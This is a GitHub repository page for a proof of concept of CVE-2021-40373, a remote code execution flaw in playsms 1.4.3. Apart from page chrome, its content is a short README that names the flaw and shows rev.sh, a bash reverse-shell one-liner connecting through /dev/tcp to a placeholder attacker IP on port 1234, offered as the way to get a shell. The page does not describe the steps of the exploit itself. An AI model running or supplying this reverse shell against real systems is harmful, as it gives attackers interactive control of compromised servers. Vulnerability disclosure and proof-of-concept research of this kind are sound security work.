Skip to content

maikroservice/CVE-2021-40373

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-playsms

There is a vulnerability in playsms 1.4.3 that allows potential attackers to execute remote code execution.

how to reproduce RCE (shell):

https://playsms.org/

rev.sh

#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"

About

CVE-2021-40373 - remote code execution

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published